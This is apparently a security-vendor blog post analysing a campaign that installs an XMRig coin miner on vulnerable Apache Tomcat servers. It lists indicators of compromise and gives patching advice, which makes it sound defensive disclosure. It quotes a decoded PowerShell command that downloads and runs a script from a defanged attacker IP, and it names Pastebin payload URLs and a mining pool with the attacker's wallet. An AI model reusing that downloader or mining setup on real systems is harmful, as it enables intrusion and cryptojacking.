CoinMiner Being Installed on Vulnerable Apache Tomcat Web Server

The ASEC analysis team has recently identified attacks targeting vulnerable Apache Tomcat web server. The Tomcat server that has not been updated to the latest version is one of the major attack vectors that exploit vulnerabilities. In the past, the ASEC blog has also covered attacks targeting Apache Tomcat servers with the vulnerable JBoss version installed. The attackers used JexBoss, a vulnerability exploitation tool, to install a WebShell before gaining control over the target system with the Meterpreter malware.

Ordinarily, when attackers find a web server with a vulnerable version from scanning, they use the vulnerability suitable for the version to install a WebShell or execute malicious commands. For reference, on the IIS Windows web server, the attacker’s commands are executed by w3wp.exe, and processes like tomca7.exe and tomcat9.exe are responsible for these actions on Apache Tomcat servers. Cases of attacks against IIS web servers have been covered in the following ASEC blog post.

The specific attack method used by the attacker has not yet been identified, but according to AhnLab Smart Defense (ASD) log, it has been found that a PowerShell command had been executed in the infected systems.

Figure 1. ASD logs of the Tomcat process executing PowerShell command – 1

The PowerShell command executed by the Tomcat process is encoded with Base64 as shown below, and decoding it shows that it is a downloader command that downloads and executes the PowerShell command.

Figure 2. ASD logs of the Tomcat process executing PowerShell command – 2

Decoded PowerShell command

IEX (New-Object System.Net.Webclient).DownloadString(‘hxxp://61.103[.]177.229:8000/css/ta.txt’)

The PowerShell script that is downloaded and executed first registers the PowerShell command to the WMI event monitoring method or the task scheduler depending on whether it currently has the SYSTEM permission or not in order to maintain persistence.

Figure 3. PowerShell command to maintain persistence

The PowerShell commands are all similar, and all they do is download and execute scripts from the Pastebin addresses shown below. Currently, there is no normal PowerShell address in the URLs, so persistence cannot be maintained, but it is deemed that in the past, CoinMiners would have been installed in a similar manner to the malware that will be covered below.

  • – hxxps://pastebin[.]com/raw/3a9iMmp5
  • – hxxps://pastebin[.]com/raw/H4vnbNqe

Afterward, it downloads and installs the XMRig CoinMiner and config files from an external source. Aside from these, there is a routine that terminates particular services and task schedulers, and these are thought to be CoinMiners that could have been installed by other attackers.

Figure 4. CoinMiner installation routine
Figure 5. config.json config file
  • Mining Pool Address: “pool.supportxmr[.]com:80”
  • User : “4AjC6NFWZvQNhPrHYDBbwhFzqjwEcwVzZLLfb4s66X4r1WTFePbX85B88sw6fFPK38QxLewd2c1W9UJzgoSe6v3o3WGtuVD”
  • Pass: “x”

For reference, it is likely that the URL where the CoinMiner has been uploaded to is also that of a Korean company. Upon access, the following login page of a customer support and billing system was shown, and it seems that this system also has been infiltrated by the attacker and had malware uploaded to it.

Figure 6. An infected system where CoinMiner has been uploaded

There is also a RAR SFX executable among the malware distributed from the URL above, and assuming that it contains XMRig and config.json and the same mining pool address and attacker account was used, it is likely to be malware that is installed by the PowerShell script uploaded to Pastebin in the past.

Figure 7. VBS malware generated by the RAR SFX malware

Administrators should change account credentials that are set to default and prevent vulnerability attacks by updating the server to the newest version for vulnerability patches. For public servers, it is necessary to control external access via security products. Also, V3 should be updated to the latest version so that malware infection can be prevented.

AhnLab’s anti-malware software, V3, detects and blocks these malware using the following aliases:

[File Detection]
– Downloader/PowerShell.Generic (2022.10.19.03)
– Win-Trojan/Miner3.Exp (2020.01.23.00)
– CoinMiner/Script.Agent (2022.10.19.03)
– Dropper/Win.Miner.C5283988 (2022.10.19.03)
– Trojan/VBS.Runner.SC184041 (2022.10.19.03)

[Behavior Detection]


– 12799b5f179c7d84122a79fc2d4e2629 : PowerShell script
– 1925ba565905e6b0e6c2b2f55f9fee96 : XMRig CoinMiner
– 606ce310d75ee688cbffaeae33ab4fee : XMRig CoinMiner
– a969e99ce36946d7fbece73f874b4e7d : config.json
– 627d3815c9faf693d89cf1361706a856 : config.json
– 4346850f1794c621d06f08e58f530365 : CoinMiner dropper malware
– 1650d7d352a8cd12bf598f71e9daf98b : VBS malware

Download URLs
– hxxp://61.103.177[.]229:8000/css/ta.txt
– hxxp://61.103.177[.]229:8000/js/xmrig.exe
– hxxp://61.103.177[.]229:8000/css/config.json
– hxxps://pastebin[.]com/raw/H4vnbNqe
– hxxps://pastebin[.]com/raw/3a9iMmp5

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post <strong>CoinMiner Being Installed on Vulnerable Apache Tomcat Web Server</strong> appeared first on ASEC BLOG.

Article Link: CoinMiner Being Installed on Vulnerable Apache Tomcat Web Server - ASEC BLOG